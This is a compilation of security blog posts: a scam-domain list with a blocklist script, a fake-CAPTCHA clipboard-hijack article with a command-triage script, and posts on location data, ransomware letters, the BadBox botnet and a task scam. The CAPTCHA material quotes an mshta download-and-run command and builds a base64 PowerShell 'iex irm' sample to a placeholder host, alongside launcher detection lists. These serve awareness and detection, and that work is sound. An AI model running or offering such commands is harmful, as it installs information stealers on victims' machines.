20win88[.]com
20winluck[.]com
aposta20bet[.]com
apostas20[.]com
bet-20[.]it
bet-20[.]pl
bet20[.]com[.]br
bet20[.]com[.]pl
bet20[.]com[.]pt
bet20[.]gr
bet20[.]online
bet20[.]pt
bet20brasil[.]com
bet20brazil[.]com
bet20italia[.]com
bet20portugal[.]com
bet20pt[.]com
bonus-20bet[.]com
bookie20[.]com
es20bet[.]com
esbet20[.]com
forum20bet[.]com
free-bookie[.]com
free20bet[.]com
links20[.]world
mail20media[.]com
pt-20bet[.]com
svkzjv[.]com
twentybet[.]net
xxbet[.]it
xxbetportugal[.]com
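The list above is defanged (dots written as [.]) so nobody clicks a live link by accident, which also means it has to be normalized before it can feed a blocklist. As an added example, not code from the article, the Python below refangs such a list, keeps the brand labels, drops junk lines and duplicates, and emits two views a defender can use: exact hostnames in hosts-file form, and registrable domains for a DNS-level block that also catches subdomains like ww16[.]mostbetru-44[.]com. The sample input is constructed from a few entries above rather than the full list, and the short second-level suffix table (co.nz, com.de) is an assumption standing in for the Public Suffix List.

```python
import re
from collections import OrderedDict
from typing import Dict, List

# Constructed sample in the same layout as the IOC section above: a label line
# ending in a dash, then one defanged host per line. It is a subset, not the
# full list, and includes a duplicate and a junk line on purpose.
SAMPLE_IOCS = """\
MostBet –
2d593xv[.]com
ww16[.]mostbetru-44[.]com
2d593xv[.]com
20Bet –
20-bet[.]ar
20bet[.]co[.]nz
hxxps://20bet[.]com[.]de/promo
this is not a hostname
"""

# RFC 1123 style hostname: dotted labels of letters/digits/hyphens, alpha TLD.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$"
)
LABEL_RE = re.compile(r"^(.*?)\s*[–-]\s*$")   # "MostBet –" -> "MostBet"
# Second-level public suffixes seen in the list (co.nz, com.de, org.in ...).
# Assumption/shortcut: a real tool would consult the Public Suffix List.
SECOND_LEVEL = {"co", "com", "org", "net"}


def refang(ioc: str) -> str:
    """Undo the usual defanging so the string can be matched against real traffic."""
    s = ioc.strip().lower()
    s = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", s)  # a[.]b -> a.b
    s = re.sub(r"^hxxps?://", "", s)             # drop a hxxp:// scheme
    return s.split("/", 1)[0]                     # keep the host part only


def registered_domain(host: str) -> str:
    """Collapse a hostname to its registrable domain (ww16.x.com -> x.com)."""
    labels = host.split(".")
    if len(labels) >= 3 and labels[-2] in SECOND_LEVEL and len(labels[-1]) == 2:
        return ".".join(labels[-3:])   # 20bet.co.nz stays 20bet.co.nz
    return ".".join(labels[-2:])


def parse_ioc_list(text: str) -> Dict[str, List[str]]:
    """Return {label: [hosts]} in list order; duplicates and junk lines dropped."""
    groups: Dict[str, List[str]] = OrderedDict()
    current = "unlabelled"
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LABEL_RE.match(line)
        if m and m.group(1):
            current = m.group(1)
            groups.setdefault(current, [])
            continue
        host = refang(line)
        if not HOSTNAME_RE.match(host):
            continue  # refuse to put junk into a blocklist
        bucket = groups.setdefault(current, [])
        if host not in bucket:
            bucket.append(host)
    return groups


def to_hosts_file(groups: Dict[str, List[str]]) -> str:
    """Exact-name entries: a hosts file does not match subdomains, so every
    hostname from the list is emitted exactly as seen."""
    return "\n".join(
        f"0.0.0.0 {host} # {label}" for label, hosts in groups.items() for host in hosts
    )


def domain_blocklist(groups: Dict[str, List[str]]) -> List[str]:
    """Registrable domains for a resolver that blocks a name and everything
    under it (RPZ / wildcard style)."""
    return sorted({registered_domain(h) for hosts in groups.values() for h in hosts})


if __name__ == "__main__":
    parsed = parse_ioc_list(SAMPLE_IOCS)
    print(to_hosts_file(parsed))
    print(domain_blocklist(parsed))
```

A hosts file only matches exact names, so a mirror that moves from ww16 to ww39 on the same domain slips past it; that is why the second function collapses to registrable domains, which belong in a resolver that supports wildcard or RPZ blocking rather than in a hosts file.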
How ads weirdly know your screen brightness, headphone jack use, and location, with Tim Shott (Lock and Code S06E05)
This week on the Lock and Code podcast…
Something’s not right in the world of location data.
In January, a location data broker named Gravy Analytics was hacked, with the alleged cybercriminal behind the attack posting an enormous amount of data online as proof. Though relatively unknown to most of the public, Gravy Analytics is big in the world of location data collection, and, according to an enforcement action from the US Federal Trade Commission last year, the company claimed to “collect, process, and curate more than 17 billion signals from around a billion mobile devices daily.”
Those many billions of signals, because of the hack, were now on display for security researchers, journalists, and curious onlookers to peruse, and when they did, they found something interesting. Listed amongst the breached location data were occasional references to thousands of popular mobile apps, including Tinder, Grindr, Candy Crush, My Fitness Pal, Tumblr, and more.
The implication, though unproven, was obvious: The mobile apps were named with specific lines of breached data because those apps were the source of that breached data. And, considering how readily location data is traded directly from mobile apps to data brokers to advertisers, this wasn’t too unusual a suggestion.
Today, nearly every free mobile app makes money through ads. But ad purchasing and selling online is far more sophisticated than it used to be for newspapers and television programs. While companies still want to place their ads in front of demographics they believe will have the highest chance of making a purchase—think wealth planning ads inside the Wall Street Journal or toy commercials during cartoons—most of the process now happens through pieces of software that can place bids at data “auctions.” In short, mobile apps sometimes collect data about their users, including their location, device type, and even battery level. The apps then bring that data to an advertising auction, and separate companies “bid” on the ability to send their ads to, say, iPhone users in a certain time zone or Android users who speak a certain language.
This process happens every single day, countless times every hour, but in the case of the Gravy Analytics breach, some of the apps referenced in the data expressed that, one, they’d never heard of Gravy Analytics, and two, no advertiser had the right to collect their users’ location data.
In speaking to 404 Media, a representative from Tinder said:
“We have no relationship with Gravy Analytics and have no evidence that this data was obtained from the Tinder app.”
A representative for Grindr echoed the sentiment:
“Grindr has never worked with or provided data to Gravy Analytics. We do not share data with data aggregators or brokers and have not shared geolocation with ad partners for many years.”
And a representative for a Muslim prayer app, Muslim Pro, said much of the same:
“Yes, we display ads through several ad networks to support the free version of the app. However, as mentioned above, we do not authorize these networks to collect location data of our users.”
What all of this suggested was that some other mechanism was allowing for users of these apps to have their locations leaked and collected online.
And to try to prove that, one independent researcher conducted an experiment: Could he find himself in his own potentially leaked data?
Today, on the Lock and Code podcast with host David Ruiz, we speak with independent researcher Tim Shott about his investigation into leaked location data. In his experiment, Shott installed two mobile games that were referenced in the breach, an old game called Stack, and a more current game called Subway Surfers. These games had no reason to know his location, and yet, within seconds, he was able to see more than a thousand requests for data that included his latitude, his longitude, and, as we’ll learn, a whole lot more.
“ I was surprised looking at all of those requests. Maybe 10 percent of [them had] familiar names of companies, of websites, which my data is being sent to… I think this market works the way that the less you know about it, the better from their perspective.”
Tune in today to listen to the full conversation.
Show notes and credits:
Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)
Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.
Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.
Fake Captcha websites hijack your clipboard to install information stealers
There are more and more sites that use a clipboard hijacker and instruct victims on how to infect their own machine.
I realize that may sound like something trivial to steer clear from, but apparently it’s not because the social engineering behind it is pretty sophisticated.
At first, these attacks were more targeted at people that could provide cybercriminals a foothold at a targeted company, but their popularity has grown so much that now anyone can run into one of them.
It usually starts on a website that promises visitors some kind of popular content: Movies, music, pictures, news articles, you name it.
Nobody will think twice when they are asked to prove they are not a robot.
But the next step in this method isn’t what you would normally see. If you tick the checkbox, you’ll be forwarded to something that looks like this:
“To better prove you are not a robot, please:
- Press & hold the Windows Key + R.
- In the verification windows, press Ctrl + V.
- Press Enter on your keyboard to finish.
You will observe and agree:
“I’m not a robot – reCAPTCHA Verification ID: 8253”
Perform the steps above to finish verification.”
While these instructions may seem harmless enough, following them infects you with malware, most likely an information stealer. In the background, the website you visited copied a command to your clipboard. In Chromium-based browsers (which is almost all of the popular ones) a page can only write to the clipboard in response to a user gesture, but your click on the fake checkbox on the first screen counts as that gesture, so the browser allows the write without any further prompt.
What the instructions in the prompt are telling you to do is:
- Open the Run dialog box on Windows.
- Paste the content of your clipboard into that dialog box.
- Execute the command you just pasted.
They are not lying about what you will “observe”, but what they don’t tell you is that the text you see is only the tail of what you pasted, and that it is not part of the command at all, just a comment appended behind it.
Under normal circumstances, only that last part of the pasted content is visible in the narrow Run box.
The first part of what the target was instructed to paste is a variation, sometimes obfuscated, of:
mshta https://{malicious.domain}/media.file
mshta invokes the legitimate Windows executable mshta.exe (the Microsoft HTML Application host), which fetches the file from the specified domain and runs it. The name of the file may look perfectly fine: we have seen mp3, mp4, jpg, jpeg, swf and html extensions, and there will be other possibilities.
What the file really contains is an encoded PowerShell command that runs invisibly and downloads the actual payload. For a while, the malware we saw downloaded was almost exclusively the Lumma Stealer infostealer, but recently we have also found campaigns that use the same method to spread SecTopRAT. Both are designed to steal sensitive data from your machine.
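The pasted line is easy to triage once you know its shape: a script host or downloader as the first token, a remote URL (often named like a media file), and a trailing “I’m not a robot” decoy after a # so that only the decoy shows in the Run box. As an added example, not Malwarebytes’ own code, the Python below classifies such strings as a defender would find them in a process-creation log or in the Run dialog history Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU; it also base64-decodes a PowerShell -EncodedCommand argument (UTF-16LE) to surface a URL hidden there. The sample commands are constructed and example.invalid is a placeholder domain, not an indicator from the article.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Script hosts and downloaders seen as the first token of the pasted line.
LAUNCHERS = {"mshta", "powershell", "pwsh", "cmd", "curl", "certutil",
             "bitsadmin", "rundll32", "msiexec", "wscript", "cscript"}
# Extensions the article reports for the disguised mshta payload.
MEDIA_EXT = (".mp3", ".mp4", ".jpg", ".jpeg", ".swf", ".html")
URL_RE = re.compile(r"https?://[^\s'\"<>#]+", re.IGNORECASE)
DECOY_RE = re.compile(r"not a robot|recaptcha|verification id", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                    re.IGNORECASE)
# The decoy is appended after a '#' (or '::') so it is all that shows in Run.
COMMENT_RE = re.compile(r"\s+(?:#|::)\s*(.*)$")

# Constructed samples; example.invalid is a placeholder, not a real IOC.
ENCODED = base64.b64encode(
    'iex (irm "https://example.invalid/p.ps1")'.encode("utf-16le")).decode()
SAMPLES = {
    "mshta": "mshta https://example.invalid/media.mp4 # \u2705 "
             "\"I'm not a robot - reCAPTCHA Verification ID: 8253\"",
    "encoded": f"powershell -w hidden -ep bypass -enc {ENCODED}",
    "benign": r'"C:\Windows\System32\notepad.exe" C:\notes.txt',
    "echo": "cmd /c echo hello",
}


@dataclass
class Verdict:
    suspicious: bool
    launcher: Optional[str]
    urls: List[str]
    decoy: Optional[str]
    reasons: List[str] = field(default_factory=list)


def split_decoy(cmd: str) -> Tuple[str, Optional[str]]:
    """Separate the real command from the trailing decoy text."""
    m = COMMENT_RE.search(cmd)
    if not m:
        return cmd.strip(), None
    return cmd[: m.start()].strip(), m.group(1).strip()


def launcher_of(body: str) -> Optional[str]:
    """Basename of the first token, without path, quotes or .exe."""
    if not body:
        return None
    tok = body.split(None, 1)[0].strip("\"'")
    name = re.split(r"[\\/]", tok)[-1].lower()
    if name.endswith(".exe"):
        name = name[:-4]
    return name if name in LAUNCHERS else None


def decoded_urls(body: str) -> List[str]:
    """URLs hidden inside a PowerShell -EncodedCommand (base64 of UTF-16LE)."""
    found: List[str] = []
    for tok in ENC_RE.findall(body):
        try:
            text = base64.b64decode(tok).decode("utf-16le", errors="ignore")
        except (binascii.Error, ValueError):
            continue
        found.extend(URL_RE.findall(text))
    return found


def triage(cmd: str) -> Verdict:
    body, decoy = split_decoy(cmd)
    launcher = launcher_of(body)
    urls = URL_RE.findall(body) + decoded_urls(body)
    has_decoy = bool(decoy and DECOY_RE.search(decoy))
    reasons: List[str] = []
    if launcher:
        reasons.append(f"launcher: {launcher}")
    if urls:
        reasons.append("fetches remote content")
    if launcher == "mshta" and any(
            u.lower().split("?", 1)[0].endswith(MEDIA_EXT) for u in urls):
        reasons.append("script host pointed at a file named like media")
    if ENC_RE.search(body):
        reasons.append("base64-encoded PowerShell command")
    if has_decoy:
        reasons.append("trailing 'I'm not a robot' decoy text")
    # A launcher alone (cmd /c echo) is noise; a launcher plus a remote fetch
    # or the decoy text is the fake-CAPTCHA pattern.
    suspicious = launcher is not None and (bool(urls) or has_decoy)
    return Verdict(suspicious, launcher, urls, decoy, reasons)


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        v = triage(cmd)
        print(f"{name:8} suspicious={v.suspicious} reasons={v.reasons}")
```

The decoy check is deliberately separate from the launcher check: the text after the # is what persuades the victim, but it is also the cheapest thing for the attacker to change, so a launcher fetching remote content is flagged even when the comment is missing.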
How to stay safe
There are a few things you can do to protect yourself from falling victim to these and similar methods:
- Do not follow instructions provided by some website you visited without thinking it through.
- Use an active anti-malware solution that blocks malicious websites and scripts.
- Use a browser extension that blocks malicious domains and scams.
- Disable JavaScript in your browser before visiting unknown websites.
The clipboard write is triggered by JavaScript, typically document.execCommand('copy') (or the newer navigator.clipboard.writeText), in response to your click. Disabling JavaScript stops that from happening, but it has the disadvantage that it will break many websites that you visit regularly. What I do is use different browsers for different purposes.
Here are step-by-step instructions on how to disable JavaScript in several popular browsers:
How to disable JavaScript in Chrome
- Open Chrome and click on the three-dot menu icon in the top right corner.
- Select Settings from the dropdown menu.
- On the left side, click on Privacy and security.
- Click on Site settings.
- Scroll down to the Content section and click on JavaScript.
Toggle the switch to Don’t allow sites to use JavaScript to Disable JavaScript for all sites. You can also add specific sites to block or allow JavaScript by clicking on Add under the Block or Allow sections.
How to disable JavaScript in Firefox
- Open Firefox, type about:config in the address bar and accept the warning page.
- Search for the preference javascript.enabled.
- Click the toggle to set it to false.
Firefox has no JavaScript checkbox in its Settings panels; this preference is the switch, and it applies to every site. Pages that are already open need a reload to pick up the change, and per-site control requires an extension such as NoScript.
How to disable JavaScript in Opera
- Launch Opera and click on the settings icon.
- Select Privacy & Security from the options.
- Click on Site Settings.
- Select the JavaScript option.
- Choose Don’t allow sites to use JavaScript to disable JavaScript for all sites.
To disable JavaScript for specific sites, click Add under the Not allowed to use JavaScript section and enter the site’s URL.
How to disable JavaScript in Edge
- Open Microsoft Edge and click on the three-dot menu icon in the top right corner.
- Select Settings from the dropdown menu.
- In the left sidebar, click on Cookies and Site Permissions.
- Scroll down to the All Permissions section and select JavaScript.
Toggle the switch to disable JavaScript. You can also manage JavaScript settings for individual sites by adding them to the allow or block lists.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
A week in security (March 3 – March 9)
Last week on Malwarebytes Labs:
- TikTok: Major investigation launched into platform’s use of children’s data
- PayPal scam abuses Docusign API to spread phishy emails
- Android zero-day vulnerabilities actively abused. Update as soon as you can
- I spoke to a task scammer. Here’s how it went
- Android botnet BadBox largely disrupted
- Ransomware threat mailed in letters to business owners
- Reddit will start warning users that upvote violent content
Last week on ThreatDown:
Stay safe!
Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.
Malwarebytes Premium Security awarded “Product of the Year” from AVLab
Malwarebytes Premium Security has once again been awarded “Product of the Year” after successfully blocking 100% of “in-the-wild” malware samples. The samples were deployed in multiple, consecutive third-party tests conducted by the AVLab Cybersecurity Foundation.
AVLab commended Malwarebytes for “providing effective detection and removal of many types of malware, including recovery from cyberattacks”.
The recognition cements Malwarebytes Premium Security’s perfect record of repeatable, trusted, and proven protection for users. It also comes with an additional AVLab certification for “Top Remediation Time”.
The latest results are part of AVLab’s regular “Advanced In-The-Wild Malware Test”.
In 2024, AVLab tested 3,103 unique malware samples against 14 cybersecurity products. Malwarebytes Premium Security detected 3,103 out of 3,103 malware samples, with a remediation time of 17.1 seconds—almost 26 seconds faster than the industry average.
ThreatDown, powered by Malwarebytes, also participated in AVLab’s evaluation, where it similarly blocked 100% of malware samples with a remediation time of 13.7 seconds.
AVLab’s evaluations, which are performed every other month by a team of cybersecurity and information security experts, are constructed to test and compare cybersecurity vendors against the latest malware. To ensure the evaluations reflect current cyberthreats, each round of testing follows three steps:
- Collecting and verifying in-the-wild malware: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact to networks and endpoints.
- Simulating a real-world scenario in testing: To recreate how a real-life cyberattack would occur, AVLab uses the Firefox web browser to engage with the known, malicious URLs collected in the step prior. In the most recent test, AVLab emphasized the potential for these URLs to be sent over instant messaging platforms, including Discord and Telegram.
- Incident recovery time assessment: With the various cybersecurity products installed, AVLab measures whether the evaluated product detects a malware sample, when it detects a sample, and how long it took to detect that sample. The last metric is referred to as “Remediation Time.”
Malwarebytes is proud to receive “Product of the Year” and “Top Remediation Time” from AVLab, and is thankful to the third-party tester for its important work in the industry.
Reddit will start warning users that upvote violent content
In a post on r/RedditSafety by a Reddit administrator, the platform announced that it will start sending warnings to users that upvote violent content.
Reddit is a social media platform and online forum where users can share and discuss content across a wide range of topics. The platform’s structure divides it into communities known as “subreddits,” each focused on a specific subject or interest (from cars to movies to sports to knitting). Users can submit posts, which can be links, text, images, or videos, and other users can vote on these posts using “upvotes” or “downvotes.” The voting system determines the visibility of posts, with highly upvoted content appearing at the top of subreddits and potentially reaching the site’s front page.
For now, the new enforcement action will be limited to users that regularly upvote violent content and the repercussions will be limited to a warning, but it’s not unthinkable that the platform may decide firmer measures are necessary, and the scope of the warnings may also be widened to other bad or violating content.
Some subreddits have additional rules about which content is allowed, but this new policy is a global one. In the discussion following the announcement, the administration promised to check whether a user upvoted an edited post, to avoid sending a warning to users that did not see the offending content when they cast their vote.
Before this new enforcement action, Reddit already acted based on rules against violent content, which prohibit content that encourages, glorifies, incites, or calls for violence or physical harm against individuals or groups. But the actions only affected the actual posters and not the users engaging with the content.
But as Reddit points out, the culture of a community is not just the posts themselves, but also the interaction that the posts initiate.
“Voting comes with responsibility. This will have no impact on the vast majority of users as most already downvote or report abusive content. It is everyone’s collective responsibility to ensure that our ecosystem is healthy and that there is no tolerance for abuse on the site.”
Given the recently announced investigation by the UK’s Information Commissioner’s Office (ICO) focusing on the content that platforms like TikTok, Imgur, and Reddit show to young users, this is likely an initiative to improve the quality of the promoted content.
There are a lot of questions about this new enforcement action and how it will be implemented, and it will probably take a while before everyone is comfortable with what will be allowed or not. But if the end-result is a platform with less offensive content, then that’s a good thing.
We don’t just report on threats – we help protect your social media
Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.
Ransomware threat mailed in letters to business owners
Business owners and CEOs across the United States received customized ransomware threats this month from the most unusual of places—letters in the mail.
The letters, which were first reported by multiple cybersecurity researchers, claim to come from a ransomware group called BianLian. But since Malwarebytes first started tracking BianLian nearly one year ago, our intelligence analysts have never seen the cybercriminal gang resort to sending physical letters to make their ransom demands, suggesting that the latest snail mail campaign could be the work of copycats.
The threat, however, is still quite real, especially for small business owners who rely either on themselves or contracted IT services to investigate any technical problems.
According to multiple examples discovered by researchers, the letters in this likely hollow threat were sent through the US Postal Service. The envelopes containing the letters are stamped with the words “TIME SENSITIVE READ IMMEDIATELY” and have the following return address listed:
BianLian Group
24 Federal St, Suite 100
Boston, MA, 02110
The letters themselves level a variety of urgent threats at their recipients: their corporate network has been compromised, sensitive customer and employee data has been stolen, and there is a 10-day deadline to pay a cryptocurrency ransom before the cybercriminals leak the stolen data online.
These threats are standard for ransomware groups today, especially those that have pivoted to not only encrypting a company’s data, but stealing it in the process of an attack to use as further leverage to extort a ransom payment. In fact last year, Malwarebytes wrote about BianLian abusing a common Microsoft tool to avoid cybersecurity detection while storing massive quantities of stolen data from victims.
But the similarities between the threats in the letter and the recorded actions of BianLian end there. The letter senders claim that they “no longer negotiate with victims,” which is a rarity among ransomware gangs. In fact, negotiation is so normalized that a cottage industry of ransomware “negotiators” has popped up to help victims caught in an attack. The letters, researchers said, also contain fewer grammatical errors and better sentence structure than a typical BianLian ransomware note.
One of the letters, in full, begins:
Dear [REDACTED]
I regret to inform you that we have gained access to [REDACTED] systems and over the past several weeks have exported thousands of data files, including customer order and contact information, employee information with IDs, SSNs, payroll reports, and other sensitive HR documents, company financial documents, legal documents, investor and shareholder information, invoices, and tax documents.
Interestingly, researchers noticed that some of the letters were customized based on their recipient. If a letter was sent to a healthcare CEO, for instance, the letter warned about the theft of patient data; if the letter was sent to a CEO of a product maker, the letter warned about breached customer orders and employee data.
The amounts demanded by the letters varied reportedly from $250,000 to $350,000.
While a “physical” cyberthreat may sound silly, these letters could cause significant harm to small and growing businesses.
These personalized letters convincingly threaten network compromise, password abuse, employee exploitation, and data theft, which can be difficult to verify for any lean organization. Think about it this way: If an everyday person would struggle to check whether their home router had been compromised, many small business owners would struggle to do the same regarding their corporate infrastructure, and that’s through no fault of their own.
If you receive one of these letters in the mail, notify your IT or security team immediately. They can provide the investigation necessary to verify the security of your business.
Whether you have dedicated IT staff or not, you can protect your small business with Malwarebytes Teams, which prevents malware attacks and notifies you about suspicious activity on your network.
Android botnet BadBox largely disrupted
Removing 24 malicious apps from the Google Play store and silencing some servers almost halved a botnet known as BadBox.
The BadBox botnet focuses on Android devices, but not just phones. It also affects other devices like TV streaming boxes, tablets, and smart TVs.
The German BSI (Federal Office for Information Security) started the disruption campaign in December by blocking the malware on 30,000 devices. BadBox is referred to as a botnet, because one of its capabilities is to set up the affected device to act as a proxy, allowing other people to use the device’s internet bandwidth and hardware to route their own traffic.
This traffic can for example serve in DDoS attacks or as a platform to spread fake news and disinformation. But BadBox can also steal two-factor authentication (2FA) codes, install further malware, and perform ad fraud.
Unfortunately, the 30,000 devices cut off by the BSI were only the tip of the iceberg. Estimates say there may be as many as one million affected devices, and they were not necessarily infected by installing malicious apps. It has been suggested that manufacturers in China ship devices with backdoors hidden in the firmware, BadBox being one of them; in other words, the compromise happens in the supply chain before the device is ever sold.
The BSI said it found:
“The BadBox malware was already installed on the respective devices when they were purchased.”
According to Satori Threat Intelligence researchers:
“Devices connected to the BADBOX 2.0 operation included lower-price-point, “off brand”, uncertified tablets, connected TV (CTV) boxes, digital projectors, and more. The infected devices are Android Open Source Project devices, not Android TV OS devices or Play Protect certified Android devices.”
Off brand devices are devices which do not carry any specific brand name that you might recognize. They are often cheap and made by small manufacturers.
Following the botnet’s development after the German disruption, the researchers found new Command and Control (C2) servers which hosted a list of APKs targeting Android Open Source Project devices similar to those impacted by BadBox.
As part of the disruptions, the servers that were controlling the botnet have been sinkholed, which basically means that the traffic between those servers and the botnet clients gets redirected so it will no longer arrive at the intended destination.
How to stay safe
This disruption will likely not be the end of the story. The botnet operators will adapt again and rebuild their infrastructure. Given their supply chain of compromised devices, the botnet will resurface soon enough.
So here are a few things you can do:
- Check you don’t have the apps ‘Earn Extra Income’ and ‘Pregnancy Ovulation Calculator’, which had over 50,000 downloads each. You can recognize the malicious apps from the publisher name Seekiny Studio. If you find them on your device, remove them immediately.
- Protect your Android devices with an active security solution that can remove malicious apps and block malicious traffic.
- Google Play Protect automatically warns users and blocks apps known to exhibit BadBox 2.0-associated behavior at install time on Play Protect certified Android devices with Google Play Services. If a device isn’t Play Protect certified, carefully study its origin before purchasing it.
We don’t just report on phone security—we provide it
Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.
I spoke to a task scammer. Here’s how it went
Task scams are surging, with a year-over-year increase of 400%. So I guess it should have been no surprise when I was contacted by a task scammer on X recently.
Task scammers prey on people looking for remote jobs by offering them simple repetitive tasks such as liking videos, optimizing apps, boosting product interest, or rating product images. These tasks are usually gamified—organized in sets of 40 tasks that will take the victim to a “next level” once they are completed. Sometimes the victim will be given a so-called double task that earns a bigger commission.
The scammers make the victim think they are earning money to raise trust in the system. But, at some point, the scammers will tell the victims they have to make a deposit to get the next set of tasks or get their earnings out of the app. Victims are likely to make that deposit, or all their work will have been for nothing.
So when the task scammer contacted me on X to offer me a nice freelance job, I was keen to see where it would take me.
Beginning the message with emojis, Birdie started the chat…
Group invitation on X
“[emoji intro] Hello, I am a third-party agency from the UK, specializing in providing ranking and likes services for Booking+Airbnb hotel applications. The company is now recruiting freelancers worldwide. You only need a mobile phone to easily get it done, and the time and location are flexible. The daily salary is 100-300€, and the monthly salary of formal employees is 3000-10000€. Note (this article is not suitable for students under 22 years old, and African and Indian employees cannot be hired due to remittance issues) For more details please see the WhatsaPP link: [shortened bit.ly URL]”
In this case, I was asked to contact the scammer on WhatsApp, but I’ve also seen the same campaign asking the victims to reach out on Telegram.
Invitation to a Telegram conversation
The Telegram invitation was a bit more limited (European and American female users only) but extended to a larger group of 150 accounts on X. What the ones that reached out to me had in common was that they all found my profile on X. Mind you, my profile is not some honeytrap, it clearly says I blog for Malwarebytes.
So, last week I was up for some distraction and decided to follow up on the WhatsApp invitation which was still live. I reset an old phone to factory settings and bought a burner SIM card. With that phone in hand, I set up a Gmail account and installed WhatsApp. I added Birdie Steuber to my contacts with the phone number I found by following the URL. Then I reached out asking if they still had openings.
The bait was taken within minutes: hook, line, and sinker.
Introductions
So, Birdie is actually Tina from Sheffield in the UK. The job is available and does not require any special skills or experience. Tina tells me all you need is internet access and you can start working for booking.com.
Next is a long-winded explanation of what the job entails with another mention of the fortune you can make. I suspect the explanation is meant to be slightly confusing, knowing the general population would be embarrassed to ask for a better explanation and just will go ahead and carry out the tasks.
Explanation?
More explanations about the job are followed by a quick query whether I will be able to buy USDT, the “hottest cryptocurrency in the world” as Tina described it. (It isn’t.)
USDT required
Tina then asks me to create an account on a fake booking.com website.
Create an account on a fake booking(dot)com site
Here’s that site.
The fake booking site
Once I’d set that up, Tina set me up with a training account to learn the tasks. The actual tasks consist of clicking two buttons labelled “Start task” and “Submit”, which gets mind-numbing really quickly. But, hey, I was wasting a scammer’s time, so it was worth it.
That training account had a balance of over 1,000 USDT, probably to make the victim even more interested.
Balance of the training account
What happened next is likely a demonstration of another tactic the scammers use to get people to deposit more USDT: a lucky order!
Lucky order
I was shown a prompt that I had run into “a 4% lucky order”, which Tina called a merge task that rendered a 4% commission.
Next followed an elaborate explanation on how Tina had to top up the balance to make up for the negative “Pending Amount” and asked me to contact customer support for instructions.
Negative pending amount needs to be topped up
But to my surprise, this was not what I was asked to do the next day when we continued our conversation. However, Tina quickly revealed how they were expecting to get 100 USDT from me.
“I forgot to tell you, it takes 100usdt to complete a new round of 40/40 orders to reset 40 new orders. Because 100usdt is to optimize the hotel 100usd reservation fee. Once you complete the 40/40 order task you can withdraw all funds. This is to help the hotel increase the number of real bookings and exposure to earn commission income. The commission income per order is 0.5 per cent. 100usdt will probably get 40-60usdt after completing the 40/40 order task.”
After I completed my first 40 tasks, I was shown this notification letting me know I had reached the maximum number of tasks for the day, at which point I was expected to top up my account at my own expense.
[Image: Please contact customer service to recharge and refresh the task]
Once I had convinced Tina we had purchased 100 USDT, I was told to contact customer support for instructions.
The instructions were similar to the ones I received a day earlier. But at this point I had to terminate because I didn’t want to give the scammers any actual money.
Checking the balances of the account numbers they gave me during our conversation showed that others are likely handing over money. And they may well have many more accounts.
[Image: balance in the USDT accounts belonging to the scammers]
These scams are likely designed to be confusing. The actual tasks were nowhere near as difficult as the explanation of what the job entailed.
In the end I revealed to Tina that I was the one who wrote an article about task scams, but Tina did not give up that easily. She kept trying to convince me there was money to be made.
If you’d like to read the whole conversation I had with Tina you can find it here.
How to avoid task scams
As I pointed out, all the task scam invitations I received came in the form of message requests on X, so that is a good place to be very cautious. Once you know the red flags, it is easier to avoid falling for task scams.
- Do not respond to unsolicited job offers via text messages or messaging apps
- Never pay to get paid
- Verify the legitimacy of the employer through official channels
- Don’t trust anyone who offers to pay you for something illegal such as rating or liking things online
It’s also important to keep in mind that legitimate employers do not ask employees to pay for the opportunity to work. And as with most scams, if it sounds too good to be true, it probably is.
If you run into a task scam, please report it to the FTC at ReportFraud.ftc.gov.
We don’t just report on phone security—we provide it
Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.